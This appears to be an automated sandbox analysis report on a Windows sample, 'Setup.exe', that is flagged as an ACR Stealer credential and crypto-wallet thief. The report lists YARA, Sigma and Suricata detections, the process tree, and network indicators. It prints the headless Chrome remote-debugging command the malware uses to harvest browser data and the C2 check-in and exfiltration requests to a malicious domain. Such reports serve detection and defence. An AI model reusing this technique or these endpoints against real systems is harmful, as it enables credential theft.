Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1581482
MD5:f18fa7132a5eda29041fdd8ae85363db
SHA1:4de6de8445b5dc6897461b684da74df7e9673f78
SHA256:543c81da09d6669ddf5fbb2d6c3889d7dabfd166d3f726349c30a51c542a2f50
Tags:exeuser-aachum
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: F18FA7132A5EDA29041FDD8AE85363DB)
    • chrome.exe (PID: 1368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2140 --field-trial-handle=2028,i,5279315519537041474,755320844484096508,262144 --disable-features=PaintHolding /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • WerFault.exe (PID: 7556 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 1264 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xa0111:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Setup.exe PID: 6592JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: Setup.exe PID: 6592JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Setup.exe.2d223e4.0.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x9ab2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      0.2.Setup.exe.2d223e4.0.unpackinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
      • 0x85430:$str01: ref.txt
      • 0x85eac:$str02: Wininet.dll
      • 0x85f28:$str03: Content-Type: application/octet-stream; boundary=----
      • 0x85f70:$str04: POST
      • 0x84e88:$str05: os_c
      • 0x84e90:$str06: en_k
      • 0x85490:$str07: MyApp/1.0
      • 0x85200:$str08: /Up/b
      • 0x85998:$str10: /ujs/
      • 0x85bdc:$str11: /Up/
      • 0x859cc:$str12: ostr
      • 0x859f8:$str12: ostr
      • 0x85a24:$str12: ostr
      • 0x85a3c:$str12: ostr
      • 0x859d4:$str13: brCH
      • 0x85a04:$str13: brCH
      • 0x859e4:$str14: brGk
      • 0x84df0:$str15: https://steamcommunity.com/profiles/
      • 0x85308:$str15: https://steamcommunity.com/profiles/
      • 0x85370:$str15: https://steamcommunity.com/profiles/
      • 0x85888:$str15: https://steamcommunity.com/profiles/
      0.2.Setup.exe.2d223e4.0.raw.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x9dd2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      0.2.Setup.exe.2d223e4.0.raw.unpackinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
      • 0x86030:$str01: ref.txt
      • 0x86aac:$str02: Wininet.dll
      • 0x86b28:$str03: Content-Type: application/octet-stream; boundary=----
      • 0x86b70:$str04: POST
      • 0x85a88:$str05: os_c
      • 0x85a90:$str06: en_k
      • 0x86090:$str07: MyApp/1.0
      • 0x85e00:$str08: /Up/b
      • 0x86598:$str10: /ujs/
      • 0x867dc:$str11: /Up/
      • 0x865cc:$str12: ostr
      • 0x865f8:$str12: ostr
      • 0x86624:$str12: ostr
      • 0x8663c:$str12: ostr
      • 0x865d4:$str13: brCH
      • 0x86604:$str13: brCH
      • 0x865e4:$str14: brGk
      • 0x859f0:$str15: https://steamcommunity.com/profiles/
      • 0x85f08:$str15: https://steamcommunity.com/profiles/
      • 0x85f70:$str15: https://steamcommunity.com/profiles/
      • 0x86488:$str15: https://steamcommunity.com/profiles/

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6592, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", ProcessId: 1368, ProcessName: chrome.exe
      Sigma detected: Browser Execution In Headless Mode
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6592, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", ProcessId: 1368, ProcessName: chrome.exe
      Sigma detected: Browser Started with Remote Debugging
      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6592, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", ProcessId: 1368, ProcessName: chrome.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T21:27:38.720224+010020526741A Network Trojan was detected192.168.2.449734104.21.2.114443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T21:27:40.836719+010020526751A Network Trojan was detected192.168.2.449736104.21.2.114443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T21:27:36.583256+010028032702Potentially Bad Traffic192.168.2.449732104.121.10.34443TCP
      2024-12-27T21:27:38.720224+010028032702Potentially Bad Traffic192.168.2.449734104.21.2.114443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtmpAvira URL Cloud: Label: malware
      Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtAvira URL Cloud: Label: malware
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317BA40 lstrlen,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,CryptUnprotectData,0_2_0317BA40
      Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.2.114:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03182080 FindFirstFileA,FindNextFileA,Sleep,0_2_03182080
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317DED0 FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_0317DED0

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2052675 - Severity 1 - ET MALWARE ACR Stealer Data Exfiltration Attempt M1 : 192.168.2.4:49736 -> 104.21.2.114:443
      Source: Network trafficSuricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.4:49734 -> 104.21.2.114:443
      Source: Joe Sandbox ViewIP Address: 104.121.10.34 104.121.10.34
      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 104.121.10.34:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49734 -> 104.21.2.114:443
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0319DEB0 InternetOpenUrlA,InternetReadFile,InternetReadFile,0_2_0319DEB0
      Source: global trafficHTTP traffic detected: GET /profiles/76561199680660089 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3Host: steamcommunity.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3Host: ras2.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;E equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000003.1885541155.0000650800F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885223367.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
      Source: chrome.exe, 00000002.00000003.1885541155.0000650800F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885223367.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000002.00000002.3542562259.00006508002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: ras2.shop
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: apis.google.com
      Source: global trafficDNS traffic detected: DNS query: play.google.com
      Source: unknownHTTP traffic detected: POST /Up HTTP/1.1Content-Type: application/octet-stream; boundary=----User-Agent: MyApp/1.0Host: ras2.shopContent-Length: 349Cache-Control: no-cache
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
